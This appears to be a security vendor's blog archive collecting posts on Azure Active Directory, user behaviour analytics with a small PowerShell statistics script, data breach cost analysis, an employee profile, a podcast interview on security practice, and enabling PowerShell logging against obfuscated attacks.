Category Archives: IT Pros

Top Azure Active Directory Tutorials

Remember a few years ago when security pros and IT admins were afraid to store business files on the cloud? Today, the circumstances are different. I recently spoke with an engineer and he said he’s getting more questions about the cloud than ever before.

What’s more, according to Microsoft, 86% of Fortune 500 companies use Microsoft cloud services – Azure, Office 365, CRM Online, etc. – all of which sit on Azure AD. So it’s time we embrace the future and start learning about the difference between Windows Server Active Directory and Azure AD, Azure AD Premium, Azure AD Connect, and more.

Yes, there are already many articles and books, but sometimes it’s helpful to have a human explain how things work. So this week, I scoured through hours of Ignite and TechEd videos and found the best Azure AD explainers. By the way, if you’re already using Office 365, you’re already using Azure AD. That seemed to be the same (trick) question asked on almost every video.

Azure Active Directory, described four different ways:

This video explains Azure AD, but also provides foundational background on the challenges that led to its creation: the enormous number of apps, the multitude of devices, and the need to maintain all sorts of credentials and connections with all of your SaaS applications.

I also really liked the Cloud App Discovery feature. You’re able to get a report of how many SaaS applications your users are using, which users are using them, and how heavily.

Azure AD Premium: If you’re curious about Azure AD Premium, this video is a demo of an enterprise that had data on-prem, but started to move to cloud applications such as Office 365, Workday HR, Salesforce, and marketing applications.

Azure AD Connect: The connector is a great tool to integrate your on-premise identity system with Azure AD and Office 365.

Azure AD best practices: It’s extremely helpful to learn from others: what worked, what didn’t, and the circumstances under which important, fundamental security and infrastructure decisions were made.

Authentication on Azure AD: Before federation, a user had to share their username and password with any application that wanted to use services on their behalf. Users had to trust unknown applications with their credentials, they had to update every application when their credentials changed, and once an application had those credentials, it could do whatever it wanted. See what federation protocols, libraries and directories you’ll be using to authenticate on Azure AD and 101 ways to authenticate with Azure AD.

 

Defining Deviancy With User Behavior Analytics

For more than 10 years, security operations centers and analysts have been trading indicators of compromise (IoCs), signature- or threshold-based signs of intrusion or attempted intrusion, to try to keep pace with the ever-changing threat environment. It’s been a losing battle.

During the same time, attackers have become ever more effective at concealing their activities. Cloaking techniques, such as steganography, have rendered traditional signature- and threshold-based detective measures practically useless.

In response, the security industry has seen new demand for User Behavior Analytics (UBA), which looks for patterns of activity and mathematically significant deviations of user behaviors (app usage, file searching activities), from historical baselines.

I’m often asked about what makes UBA different from traditional SIEM-based approaches.

Know Thy Behavioral History

In my mind, the answer is history! You know that old saying: if you don’t remember the past, you’ll be condemned to repeat it? That applies to a pure SIEM-based approach that’s looking at – pun intended – current events: files deleted or copied, failed logins, malware signatures, or excessive connection requests from an IP address.

Of course, you need to look at raw events, but without context, SIEM-based stats and snapshots are an unreliable signal of what’s really happening. We call these “false positives”: cases where a SIEM system indicates an alert when there isn’t really a threat. At some point, you end up continually chasing the same false leads, or, even worse, ignoring them altogether — “dial-tone deaf”.

How many files are too many when a user is deleting or copying? How many failed logins are unusual for that particular user? When does it become suspicious for a user to visit a rarely accessed folder?

The key decision that has to be made for any event notification is  the right threshold to separate normal from abnormal.

Often there are tens, if not hundreds or thousands, of applications and user access patterns, each with a unique purpose and its own set of thresholds, signatures, and alerts to configure and monitor. A brute-force approach results in rules based not on past data but on ad hoc, it-feels-right settings that generate endless reports and blinking dashboards that require a team of people to sift out the “fake news”.

This dilemma over how to set a threshold has led security researchers to a statistical approach, where thresholds are based on an analysis of real-world user behaviors.

The key difference between UBA and monitoring techniques that rely on static thresholds is that the decision to trigger is instead guided by mathematical models and statistical analysis that’s better able to spot true anomalies, ultimately reducing false positives. Some examples of behavioral alerts:

  • Alert when a user accesses data that has rarely been accessed before, at a time of day that’s unusual for that user — 4 AM Sunday — and then emails it to an ISP based in Croatia
  • Alert when a user has a pattern of failed login events over time that is outside the normal behavior
  • Alert when a user copies files from another user’s home directory, and then moves those files to a USB drive

A Simple UBA Example

The reason UBA is so effective is that it doesn’t depend only on signature- or static threshold-based analytics.

Let’s break this down with an example.

At Acme Inc., the security team has been asked to monitor the email activity of all of its 1,000 employees. Impossible, no?

We can understand the larger problem by focusing on just 5 users (0.5% of all users). First, we apply traditional analytics and review their email activity (below) over the course of a week.

User     Monday   Tuesday   Wednesday   Thursday   Friday
Andy     10       8         30          15         13
Molly    15       29        55          33         90
Ryan     35       6         7           15         16
Sam      2        5         4           9          15
Ivan     9        1         3           5          0

Looking at this report, you might decide to investigate the users who sent the most emails, right?

You quickly learn that Molly, who sent 90 emails on Friday, is with the marketing team and her performance is based on how many customers she emails in a day. False lead!

You then decide you’re going to take the average across all users for each day of the week. You craft a static threshold alert that fires whenever a user sends more emails than the average for a given day. For the data set above, the average number of emails sent by a user on any given day is 17.

If you created an alert for any time a user sends more than 17 emails in a day, you would’ve received 6 alerts during this time frame. Four of those alerts would bring you right back to Molly, the queen of email.

This threshold is obviously too sensitive. You need a different strategy than a raw average for all users on a given day — the vertical column.

UBA’s anomaly detection algorithm looks at each user, each day, and records information about their activity. This historical information, sliced by day, time, and other dimensions, is stored in the system so baseline statistics can be created.

Think of it as the UBA tool running the reports and figuring out the averages and standard deviations for each user, comparing them to their peers, and over time escalating only those users and activities that ‘stand out from the crowd’. UBA also recalculates averages, standard deviations, and other stats dynamically over time, so that they reflect shifts in the historical trends.

For example, here’s a possible behavioral rule: Alert when a user deviates from their baseline of normal activity when sending emails.

This could be translated more precisely as ‘notify when a user is two or more standard deviations away from their mean’.


User     Monday   Tuesday   Wednesday   Thursday   Friday   Average   STDEV.S   2 SD    AVG + 2 SD
Andy     10       8         30          15         13       15.2      8.7       17.4    32.6
Molly    15       29        55          33         90       44.4      29.2      58.5    102.9
Ryan     35       6         7           15         16       15.8      11.6      23.3    39.1
Sam      2        5         4           9          15       7         5.1       10.3    17.3
Ivan     9        1         3           5           0       3.6       3.5       7.1     10.7
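Here’s a minimal PowerShell sketch of that calculation, using the sample counts from the table above. The data and the two-standard-deviation rule come straight from this post; everything else (variable names, output format) is illustrative.

```powershell
# Flag any day where a user's email count exceeds their own mean + 2 standard deviations.
# The daily counts are the sample data from the table above.
$activity = [ordered]@{
    Andy  = 10, 8, 30, 15, 13
    Molly = 15, 29, 55, 33, 90
    Ryan  = 35, 6, 7, 15, 16
    Sam   = 2, 5, 4, 9, 15
    Ivan  = 9, 1, 3, 5, 0
}
$days = 'Monday','Tuesday','Wednesday','Thursday','Friday'

foreach ($user in $activity.Keys) {
    $counts = $activity[$user]
    $mean   = ($counts | Measure-Object -Average).Average
    # Sample standard deviation, same as the STDEV.S column in the table above.
    $sumSq  = ($counts | ForEach-Object { [math]::Pow($_ - $mean, 2) } | Measure-Object -Sum).Sum
    $stdev  = [math]::Sqrt($sumSq / ($counts.Count - 1))
    $limit  = $mean + 2 * $stdev
    for ($i = 0; $i -lt $counts.Count; $i++) {
        if ($counts[$i] -gt $limit) {
            '{0}: {1} emails on {2} exceeds personal baseline of {3:N1}' -f $user, $counts[$i], $days[$i], $limit
        }
    }
}
```

Run against this particular data set, the per-user rule fires no alerts at all, compared with the six alerts generated by the one-size-fits-all threshold of 17.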

Obviously, this is not what’s done in practice – there are better statistical tests and more revealing analysis that can be performed.

The more important point is that by looking at users or a collection of users within, say, the same Active Directory groups, UBA can more accurately find and escalate true anomalies.

I’m Mike Thompson, Commercial Sales Engineer at Varonis, and This is How I Work

In March of 2015, Mike Thompson joined the Commercial Sales Engineer (CSE) team. From then on, he has been responsible for demonstrating Varonis products to potential customers, installing and configuring the software for both evaluation and production implementations, leading customer training sessions, and making sure customers are getting value out of the Varonis solutions.

This role allows him to talk to people from different parts of the country, getting a glimpse of how companies of all shapes and sizes operate. “You become fast friends when you spend a few hours on an installation with someone,” says Mike.

According to his manager Kris Keyser:

“Mike is a smart, creative engineer who’s fun to work with, is well-liked by his customers and co-workers, but takes his craft seriously. He has been a real asset to the team.”

Read on to learn more about Mike – this time, in his own words.

What would people never guess you do in your role?

CSEs already handle a lot of different things, but I suspect people would be most surprised to learn that I am a panelist on the Varonis Inside Out Security Show podcast.

How has Varonis helped you in your career development?

My time at Varonis has helped to develop my communication skills as well as providing me a better understanding of the tech and security industries since I work with so many different types of organizations. I already had technical skills before coming to Varonis, but now I am better equipped to apply my skills and experience at a larger scale.

What advice do you have for prospective candidates?

Organization is key! Also, do not be afraid to ask questions — we do a lot here at Varonis, and certain things can only be learned through direct experience.

What do you like most about the company?

The company culture is fantastic. Everyone works hard, but the expectations are very realistic, and there are plenty of opportunities to grow and take on new roles internally. Most important is the nitro cold brew tap that we have during the warm months. It is the best.

What’s the biggest data security problem your customers/prospects are faced with?

Many of our customers are taking a hard look at data security and they find that their existing security strategy and policies don’t necessarily reflect today’s threats.

The biggest problem is not identifying the risks, but rather formulating a plan of attack to rectify the situation and ensure data security going forward, as many of the customers I talk to already have a rough idea of their weak spots. Every aspect of this problem is complex, so many people don’t know where to start.

What certificates do you have?

I’m a wildcard. (That’s a certificate joke…)

Now for some Fun Facts on Mike!

What’s your all-time favorite movie or TV show?

Mad Men is definitely my favorite TV show. I have been re-watching it lately and it’s even better the second time around. Spectacular writing, great character development, attention to historical detail, and surprisingly funny.

If you could choose any place in the world to live, where would it be and why?

Right now I have no desire to leave my home in Williamsburg, Brooklyn. It’s the ideal neighborhood for me and my wife. But one day I would like to live by the beach — maybe somewhere in California where the mountains meet the ocean.

What is the first thing you would buy if you won the lottery?

A nicer apartment!

Interested in becoming Mike’s colleague? Check out our open positions, here!

My Big Fat Data Breach Cost Post, Part III

This article is part of the series "My Big Fat Data Breach Cost Series". Check out the rest:

How much does a data breach cost a company? If you’ve been following this series, you’ll know that there’s a huge gap between Ponemon’s average cost per record and the Verizon DBIR’s (as well as other researchers’). Verizon was intentionally provocative with its $.58 per record claim. However, Verizon’s more practical (and less newsworthy) results were based on a different model that derived average record costs more in line with Ponemon’s analysis.

The larger issue, as I’ve been preaching, is that a single average for a skewed data set, or more precisely one that follows a power law, is not the best way to understand what’s going on. For a single number, the median, the value below which 50% of the data set lies, does a better job of summarizing it all.

Unfortunately, when we introduce averages based on record counts, the problem is made even worse. Long sigh.

Fake News: Ponemon vs. Verizon Controversy

In other words, there are monster breaches in the Verizon data (based on NetDiligence’s insurance claim data) at the far end of the tail that result in hundreds of millions of records — and therefore an enormous denominator in calculating the average.

I should have mentioned last time that Ponemon’s dataset is based on breaches of fewer than 100,000 records. Since cyber incidents involve some hefty fixed costs for consulting and forensics, you’ll inevitably get a higher average when dividing the incident cost by a smaller denominator.

In brief: Ponemon’s $201 vs. Verizon’s $.58 average cost per record is a made-up controversy that compares the extremes of this weird dataset.

As I showed, when we ignore record counts and use average incident costs we get better agreement between Verizon and Ponemon – about $6 million per breach.

There’s a “but”.

Since we’re dealing with power laws, the single average is not a good representation. Why? So much of the sample is found at the beginning of the tail, and the median — the incident cost below which 50% of the incidents lie — is not even close to the average!

My power law fueled analysis in the last post led to my amazing 3-tiered IOS Data Incident Cost Table©. I broke the fat-tailed dataset (based on NetDiligence’s numbers) into three smaller segments — Economy, Economy Plus, and Business Class —  to derive averages that are far more representative.

My Economy Class, which is based on 50% of the sample set, has an average incident cost of $1.4 million versus the overall average of $7.6 million. That’s an enormous difference! You can think of this average cost for 50% of the incidents as something like a hybrid of median and mean — it’s related to the creepy Lorenz curve from last time.

Ponemon and Pain

Let’s get back to the real world, and take another look at Ponemon’s survey. Their analysis is based on interviews with real people working for hundreds of companies worldwide.

Ponemon then calculates a total cost that takes into account direct expenses — credit monitoring for affected customers, forensic analysis — and fuzzier indirect costs, which can include extra employee hours and potential lost business.

These indirect costs are significant: in their 2015 survey, they represented almost 40% of the total cost of a breach!

As for the 100,000 record limit, Ponemon is well aware of this issue and warns that their average breach cost number should not be applied to large breaches. For example, Target’s 2014 data breach exposed the credit card numbers of over 40 million customers, which works out to a grand total of over $8 billion based on the Ponemon average. Target’s actual breach-related costs were far less.

Once you go deeper into the Ponemon reports, you’ll find some incredibly useful insights.

In the 2016 survey, they note that having an incident response team in place lowers breach costs by $16 per record; Data Loss Prevention (DLP) takes another $8 off; and data classification schemes lop off another $4.

Another interesting fact is that a large contributing factor to indirect costs is something called “churn”, which Ponemon defines as current customers who terminate their relationship as the result of loss of trust in the company after a breach.

Ponemon also estimates “diminished customer acquisition”, another indirect cost related to churn, which is the cost of lost future business because of damage to the brand.

These costs are based on Ponemon analysts reviewing internal corporate statistics and putting a “lifetime” value on a customer.

Feel the pain: Ponemon’s data on lost business.

Anyway, by comparing churn rates after a breach incident to historical averages, they can detect abnormal rates and then attribute the cost to the incident.

Ponemon consolidated the business lost to churn, additional acquisition costs, and damage to “goodwill” into a bar chart (above) divided by country. For the US, the average opportunity cost for a breach is close to $4 million.

With that in mind, it’s helpful to view the average cost per record breached as a measure of overall corporate pain.

What does that mean?

In addition to actual expenses, you can think of Ponemon’s average as also representing extra IT, legal, call center, and consultant person-days of work and emotional effort; additional attention focused in future product marketing and branding; and administrative and HR resources needed for dealing with personnel and morale issues after a breach.

All of these factors are worth considering when your organization plans its own breach response program!

Some Additional Thoughts

In our chats with security pros, attorneys, and even a small business owner who directly experienced a hacking, we learned first-hand that a breach incident is very disruptive.

It’s not just the “cost of doing business”, as some have argued. In recent years, we’ve seen several CEOs fired. More recently, with the Equifax breach, along with the C-suite leaving or “retiring”, the company’s very existence is being threatened through lawsuits.

There is something different about a data breach. Information on customers and executives, as well as corporate IP, can be leveraged in various creative and evil ways: identity theft attacks, blackmail, and competitive threats.

While the direct upfront costs, though significant, may not reach the $100 to $200 per record range that shows up in the press, a cyber attack resulting in a data exposure is still an expensive incident — as we saw above, over $1 million on average for most companies.

And for the longer term, Ponemon’s average cost numbers are the only measurement I know of that reflects the accounting for these unknowns.

It’s not necessarily a bad idea to be scared by Ponemon’s stats, and change your data security practices accordingly.


The Difference between Windows Server Active Directory and Azure AD

Once upon a time, IT pros believed that the risks of a data breach and compromised credentials were high enough to delay putting data on the cloud. After all, no organization wants to be a trending headline, announcing yet another data breach to the world. But over time with improved security, wider adoption and greater confidence, tech anxiety subsides and running cloud-based applications such as Microsoft’s subscription-based service Office 365 feels like a natural next step.

Once organizations start using Office 365, how do they manage AD? Windows Server AD or Azure AD? How are on-premise AD and Azure AD similar, and how are they different?

In this post, I will discuss the similarities, differences, and a few things in between.

What We Know For Sure: Windows Server Active Directory

Let’s start with what we know about Active Directory Domain Services.

First released with Windows 2000 Server, Active Directory is essentially a database that helps organize your company’s users, computers and more. It provides authentication and authorization to applications, file services, printers, and other on-premises resources. It uses protocols such as Kerberos and NTLM for authentication and LDAP to query and modify items in the AD database.

There’s also that wonderful Group Policy feature to streamline user and computer settings throughout a network.

With so many security groups, user and admin accounts, and passwords stored in Active Directory, and identity and access rights managed there as well, securing AD is key to safeguarding an organization’s assets.

Now with emails, files, CRM systems and even applications stored in the cloud, can we be as confident they’re as safe as when they were in the company’s own servers?

A Whole New World: AD Service in the Cloud?

As new startups and organizations build their companies, they most likely won’t have any on-premise data and the huge shocker is that they also won’t be creating forests and domains in AD. I’ll get more into this later.

But organizations with existing infrastructure have already made a significant investment in on-premise infrastructure and will have to visualize a new way of operationalizing their business.

Why? Azure AD will likely be a key part of Microsoft’s future. So if you’re already using any of Microsoft’s online services, such as Office 365, SharePoint Online and Exchange Online, you’ll have to figure out how to navigate your way around it. And it already looks like organizations are rapidly adopting cloud-based apps, running them nearly 50% of the time.

What’s different in Azure Active Directory?

First, you should know that Windows Server Active Directory wasn’t designed to manage web-based services.

Azure Active Directory, on the other hand, was designed to support web-based services that use REST (REpresentational State Transfer) API interfaces, such as Office 365 and Salesforce.com. Unlike plain Active Directory, it uses completely different protocols that work with these services (goodbye, Kerberos and NTLM), such as SAML and OAuth 2.0.

As I pointed out earlier, with Azure AD you won’t be creating forests and domains. Instead, you’ll be a tenant, which represents an entire organization. In fact, once you sign up for Office 365, SharePoint Online or Exchange Online, you’ll automatically be an Azure AD tenant, where you can manage all the users in the company as well as their passwords, permissions, user data, etc.
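If you want to poke around your tenant from the command line, a minimal sketch using the AzureAD PowerShell module looks like the following; the user principal name below is a placeholder, not a real account.

```powershell
# Assumes the AzureAD module is installed: Install-Module AzureAD
Import-Module AzureAD

# Sign in to the tenant interactively.
Connect-AzureAD

# List every user in the tenant with a few basic properties.
Get-AzureADUser -All $true | Select-Object DisplayName, UserPrincipalName, AccountEnabled

# Inspect a single (hypothetical) account by its UPN.
Get-AzureADUser -ObjectId 'molly@contoso.onmicrosoft.com' |
    Format-List DisplayName, Department, AccountEnabled
```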

Besides seamlessly connecting to any Microsoft Online Services, Azure AD can connect to hundreds of SaaS applications using single sign-on. This lets employees access the organization’s data without repeatedly being prompted to log in. The access token is stored locally on the employee’s device, and you can limit access by setting token expiration dates.

For a list on free, basic and premium features, check out this comparison chart.

Introducing Azure AD Connect

Organizations ready to integrate their on-premises structure with Azure AD can use Azure AD Connect. For a great tutorial on integration, read this how-to article.

And in an upcoming post, I’ll curate a list of top Azure AD tutorials to help you transition into a brand new interface and terminology.

With the move to Azure, we bid you farewell Kerberos, forests and domains. And flights of Microsoft angels sing thee to thy rest! 

[Transcript] Ofer Shezaf and Keeping Ahead of the Hackers

This article is part of the series "[Podcast] Varonis Director of Cyber Security Ofer Shezaf". Check out the rest:

Inside Out Security: Today I’m with Ofer Shezaf, who is Varonis’s Cyber Security Director. What does that title mean? Essentially, Ofer’s here to make sure that our products help customers get the best security possible for their systems. Ofer has had a long career in data security and I might add is a graduate of Israel’s amazing Technion University.

Welcome, Ofer.

Ofer Shezaf: Thank you.

IOS: So I’d like to start off by asking you how have attackers and their techniques changed since you started in cyber security?

OS: Well, it does give away the fact that I’ve been here for a while. And the question is also an age-old question: some people will say that it’s an ever-evolving threat, and some would say it’s just the same, time and time again.

My own opinion is that it’s a mixed bag. Techies would usually say that it’s all the same as usual. Actually, the technical attack vectors tend to be rather the same. So buffer overflows have been with us for probably 40 years, and SQL Injection for the last 20.

Nevertheless, everything around the technical attack vectors does change. And I think that the sophistication and the resources that the dark side is investing — it always amazes me how much it’s always increasing!

When Stuxnet appeared a few years back, targeted, you know, nuclear reactors in Iran, I thought it was just, you know, a game changer. Things will never be the same!

But today it seems to be that every political campaign tends to utilize the same techniques, so it’s amazing how much the bad guys are investing into those hacks. And that changes things.

 

IOS: Do you have any thoughts on the dark web, and now this new trend of actually buying productized malware? Do you think that is changing things?

OS: It certainly does change things. To generalize a bit, I think that the economy behind hacking has evolved a lot. It’s way more of a business and the dark web today is not a dark alley anymore. It’s more like a business arena.

And if you think about it, ransomware, which is a business model to make money out of malware, is using the same technical techniques as malware always did. But today’s dark web, the economical infrastructure of Bitcoin enables it to be a real business, which is where it becomes riskier and more frightening to an extent.

 

IOS: At Varonis, we have obviously been focusing on … that attackers have had no problem, or fewer problems than in the past, getting inside. And that’s basically through phishing and some other techniques.

So do you think that IT departments have adapted to this new kind of threat environment where the attacker is better able to sort of get in, you know, in through the perimeter, or they have not adapted to these kinds of threats?

OS: So I must say I meet a lot of people working in IT security. And there are some smart guys out there. So they know what it’s about — we are not blind as an industry to the new risks. That said, the hackers are successful which implies that we are missing something! Based on results, we lose.

The question of why there’s this misalignment of capabilities and results is the million-dollar question. My answer is a personal one: we don’t invest enough … I mean, it’s a nine-to-five sort of job to be in IT security, and it needs to be a lot more like policing, like physical security. We need to be into it. I coined a term for that. We need … to do continuous security, as you would expect the army or military or police to do.

 

IOS: We spoke a little bit before this and you had talked about I guess Security Operation Centers or SOCs. So is that something you think that should be more a part of the security environment?

OS: Yeah. I mentioned continuous security but it’s just a term, and it might be worth sort of thinking about what it actually implies for an organization. So SOCs have been around for a while, Security Operation Centers. But they tend to, well, not take it all the way.

I think that we need to have people sitting there really 24-7 even in smaller organizations because it’s becoming, you know… You have a guard at the door even in smaller organizations. So you need someone in the SOC all the time.

And they don’t need just to react. They need to be proactive.

So they need to hunt, to look for the bad guys, to do rounds around the building if you think about it in physical terms. And if we do that, if people invest more time, more thinking … they’ll also feed back into the technical means, which are our primary security tools today.

 

IOS: Ofer, we often see a disconnect between the executive suite and people doing data security on the ground. Maybe that’s just appearing with all the breaches in the last few years. I’m not sure. If there are one or two things you could tell the C-level about corporate data security, what would they be?

OS: So I did mention one, which is how much we invest. I think there’s under-investment and investment, at the end of the day, is in the hands of the executives.

The other thing is rather contradictory maybe but it’s important and that’s the fact that there is no total security … The only system which is entirely secure is a system which has no users and doesn’t operate. So it’s all about risk management. If it’s about risk management, it implies that we have to make choices and it also implies that we will be hacked.

And if we will be hacked, we need to make sure it’s the less important systems, and we also have to make sure that we have the right plans for the day after. What will we do when we are hacked?

So things like separating systems that are important, defining what the business-critical systems are (those where your stock would drop if they were hacked) and which are peripheral, important but less so.

 

IOS: So we’ve often talked about Privacy by Design on the IOS blog, but the term, as you told me, is actually older. It really comes out of Security by Design, which is more of a programming term. And that really means that developers should consider security as they’re developing, as they’re actually making the app.

I was wondering if this approach of Security by Design where we’re actually doing the security from the start will really lessen the likelihood of breaches in the coming years. Or will we need more incentives to get these applications to be more secure?

OS: So we are moving from operational security, which is after systems are put in place and then it will be protected, into designing their security upfront before we start deploying them. So it’s … the other part. I spent many years in applications security, which is right around that.

And I think that the concept of baking in security into the development process makes sense to everyone. It saves on later on because you don’t have to fix things when they’re found, and it also has the benefit of making systems more secure.

That said, it’s not a new concept. I mentioned that Security by Design is term that’s used for a decade-and-a-half. It doesn’t happen enough and the question is why? Why is Security by Design not happening as much as we would like it to be and how to make it better?

And I think that the key to that is that developers are not measured by security! They are measured by how much they output in terms of functionality. Quality is important but it’s measured in terms of failures rather than security breaches. And security is someone else’s problem so it’s not the developer problem or the developing manager problem.

As long as we don’t change that, as long as they don’t think of security as an important goal of the development process, it would be a leftover, something done that is an afterthought.

 

IOS: Well, it sounds like we may need other incentives here. And so for example, I can go to a store and buy a light bulb, and I know it has been certified by some outside agency. In the United States, it’s Underwriters Lab. There are a few others that do that.

Do you think we may see something like that, an outside certification saying that this software meets some minimal security requirements?

OS: So it goes back to compliance versus real security … I think compliance and regulations are important for market deficiencies. So when things do not work because they aren’t the right incentives, so it’s an important starting point.

That said, they are there, they’re just not providing enough. They’re also not, today, targeted specifically at the development phase, and in most cases, they are taken to be part of the operational phase, which is later on.

So it will be an interesting idea to try to create a development process for specific regulations. It’s harder because we make end-result regulations … we don’t make good software requirements!

That said, I’ve once seen an interesting demonstration. Somebody created a label for software, which is like the label you have on food, with the ingredients saying how much, you know, how much SQL injections it might have and how much cross-site scripting it might have, as you would have for sugars and fats …

 

IOS: It is quite an interesting idea! At the blog, we’ve written a lot about pen testing, and actually, we’ve also spoken to a few actual testers. You know, obviously, this is another way to deal with … improving security in an organization. I’m wondering, how do you feel about hiring these outside pen testers?

OS: So first of all, by definition, it’s the opposite of Security by Design. It usually comes in later in the game once the system is ready. So if I said I believe in security by design then pen testing seems to be less important. That said, because Security by Design doesn’t work well, pen testing is needed. It’s very much an educational phase where you bring people in, and they tell you that you didn’t do right.

Why I don’t see this as more than educational?  First, because pen testers usually are given just as much time as was allocated. You know, it’s money at the end of the day, and today the bad guys are just investing more.

It’s not a holistic way to make the software secure, it’s an … opportunistic one, and usually it gets some things, but it doesn’t get all the things … It’s good for education — would show there is an issue  — but it’s not good enough to make sure that we are really secure.

IOS: That’s right

OS: That said, it is important … Two things which are important when you do pen testing. The first one is since pen testers find just some of the issues, make sure that those are used to create a thought process around the larger challenges of the software!

So if they found a cross-site scripting in a specific place, don’t just fix this one, fix all of the cross-site scriptings … or think why your system was not built to overcome cross-site scripting in the first place. Take it [as a]  driver for security by design.

As an anecdote, I once met an organization where a pen tester came in, he found cross-site scripting. He demonstrated it by having the app popping up a “gotcha” dialogue. And two weeks later, the developers came back and said they fixed it. It doesn’t happen anymore, and what they did was just to check for the word “gotcha” in their input and block it, which is…it does happen, unfortunately!

And beyond fixing this …,it would be well if you have pen testing and they found cross-site scripting, fine, think of why your system, in the first place, was not built to handle those across the board.

The second thing that’s very important is pen testing is usually done very late in the development lifecycle. And too many times, there’s just not enough time to fix things. So making it earlier, making part of the, you know, test as models are released rather than last moment, will ensure that more can be fixed before launch … those systems are less vulnerable.

 

IOS: We also know that Microsoft has started addressing some long-standing security gaps … starting with Windows 10. There’s also a Windows 10 S, which is a Microsoft’s special security configuration for 10. I was wondering if you can tell us what 10 S is doing that may help organizations with their security.

OS: So Microsoft 10 S is the whitelisting version. If you think about security, there are two options to secure things and nearly every security system selects one. One of them is to allow everything in general and then try to block what’s dangerous, okay? An anti-virus would be a good example. Install whatever you want to install and then the anti-virus will catch it if it’s a virus.

The second option, whitelisting is always more secure, but always limits functionality more. Windows 10 S takes this approach. It limits installing software, only things that actually come from the Microsoft App Store.

So it’s way more limited, functionality speaking, sort of feels as it is less of a full system. And personally, you know, [as] an IT guy being here for quite a while, it feels too limited for me. But looking at how — you know, my kids are using computers — how, you know, general office workers are using computers, it might be just enough.

So it might be a good choice by Microsoft to create those limited versions that are secure by design because they allow just as much rather than blocking what’s wrong.

IOS: Right. If I understand what you’re saying, it would prevent, let’s say, malware from being loaded because the malware wouldn’t have been signed, so it wouldn’t have been loaded on the actual whitelist of …

OS: It’s not just signed, it’s actually downloaded from the Microsoft App Store, so it’s way more … Signing exists in Windows today; this is the next step.

IOS: So then it would really prevent anything from being…any outside software from being loaded. Okay. And … is there a performance penalty for that?

OS: As far as I know there is no performance penalty. In a way, the same… having more security in this case might actually improve security and stability because unpredicted software is also a challenge for performance and stability. The downside is functionality.

 

IOS: Right. We know from security analysts, hackers and the cybercriminals have targeted executives, they call it, you know, spear phishing or whale phishing and, you know, they have the more valuable information compared to the average employee.

So it will sort of make sense to actually target these people. I was wondering if you think that executives should receive extra security protections or they should take extra precautions in their dealings with, you know, just in their day-to-day work on the computer?

OS: So in a way, you said it all, because we do know that executives are targeted more, so we need to focus on securing them. We do it in the real world … drawing parallels with the physical security world, so it does make sense.  … A lot of our security controls are automated, and when it’s automated, if you invest in detecting that somebody is posing as the user, why stop at executives?

So my take on that would be: make the automated detection systems address any user, but then focus. It still gets to an incident response team that has to assess whether the risk is there and what to do. They can prioritize based on the type of user – executives being one type of sensitive user, by the way. Of course, admins are another type.

IOS: Yeah, I mean, I could almost imagine a, I guess, like a SOC having a special section just focused on executives and perhaps looking at … any kind of notifications or alerts that come up from the, you know, the standard configuration. But actually, digging a little deeper when those things come up with the executives.

OS: Yes, if you think about it, the major challenge of a SOC is handling the flow of alerts. And any means that will enable them to be more efficient in ending alerts, focusing on those that are more critical to the business where the risk is higher, is important. Executives are a very good example.

So just pop up the alerts about the executives to the top of the list, and the analyst gets to them first and he’s doing something reasonable…He is more valuable to the organization.

In fact, so there is no 100% security! Some incidents or alerts would be left.

 

IOS: One last question. Any predictions on hacking trends in the next few years? I mean, are there new techniques on the horizon that we should be paying closer attention to?

OS: Oh, it’s a crystal ball question. It’s always hard. I’m probably wrong, but I’ll say I’ll try.

So the way to look into that, the way to try to predict is that I found out that hacking techniques usually trail changes in the IT technology. Hackers become experts in the new technology only a year or two or even more than that after the technology becomes widespread. In this respect, I think that mobile is the next front.

We all use mobile, but actually, business use of mobile … which is rather new, the Salesforce Mobile App for example. In the last couple of years, we can actually do more work on the mobile device, which means it’s a good target for malware. And I think we’ve seen malware for mobile, but we still didn’t see financial or enterprise malware, such as ransomware, for mobile, and that will be coming.

IOS: And what about Internet of Things — it is kind of somewhat related to mobile — as a new trend? Are we starting to see some of that?

OS: Yes, it’s an area where we’ve seen two things. First of all, a lot of research, which always comes before actual real-world use. If you look at what researchers are doing today, you know what hackers will do in two or three years!

And to date, we’ve seen mostly denial-of-service attacks against, you know, Internet of Things devices, where they were … taken off the network.

It would be interesting — it would be frightening actually — once the bad guys start to do more innovative damage by taking over devices. You know, cars are a very frightening example, of course, traffic lights, electricity controllers, etc.

That said, the business model is the driving factor. And I still don’t see — unlike, for example, malware for mobile or a malware over on cloud systems — the business model, apart from nation states, around the Internet of Things.

IOS: It’s interesting! So, Ofer, thank you for joining us. This was a really fascinating discussion, and it’s good to get this perspective from someone who’s been in the business for such a long time.

OS: Thank you. My pleasure as well.

PowerShell Obfuscation: Stealth Through Confusion, Part II

This article is part of the series "PowerShell Obfuscation". Check out the rest:

Let’s step back a little from the last post’s exercise in jumbling PowerShell commands. Obfuscating code as a technique to avoid detection by malware and virus scanners (or prevent reverse engineering) is nothing really new. If we go back into the historical records, there’s this (written in Perl).  What’s the big deal, then?

The key change is that hackers can go malware-free by using garden variety PowerShell in practically all phases of an attack. And through obfuscation, this PowerShell-ware then effectively has an invisibility cloak.  And we all know that cloaking devices can give one side a major advantage!

IT security groups have to deal with this new threat.

Windows PowerShell Logging Is Pretty Good!

As it turns out, I was a little too quick in my review last time of PowerShell’s logging capabilities, which are enabled in Group Policy Management. I showed an example where I downloaded and executed a PowerShell cmdlet from a remote website:

I was under the impression that PowerShell logging would not show the evil malware embedded in the string that’s downloaded from the web site.

I was mistaken.

If you turn on the PowerShell module logging through GPM, then indeed the remote PowerShell code appears in the log. To refresh memories, I was using PowerShell version 4 and (I believe) the latest Windows Management Framework (WMF), which is supposed to support the more granular logging.

Better PowerShell logging can be enabled in GPM!
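For a lab box that isn’t joined to a domain, the same switches can be flipped locally. Here’s a minimal sketch of the registry values behind the “Turn on Module Logging” and “Turn on PowerShell Script Block Logging” policy items; in production you’d set these centrally through Group Policy Management instead.

```powershell
# Run from an elevated prompt; these mirror the Group Policy settings shown above.
$base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

# Module logging: log pipeline execution details for all modules ('*').
New-Item -Path "$base\ModuleLogging\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path "$base\ModuleLogging" -Name EnableModuleLogging -Value 1
Set-ItemProperty -Path "$base\ModuleLogging\ModuleNames" -Name '*' -Value '*'

# Script block logging: record the de-obfuscated script blocks the engine actually runs.
New-Item -Path "$base\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty -Path "$base\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1
```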

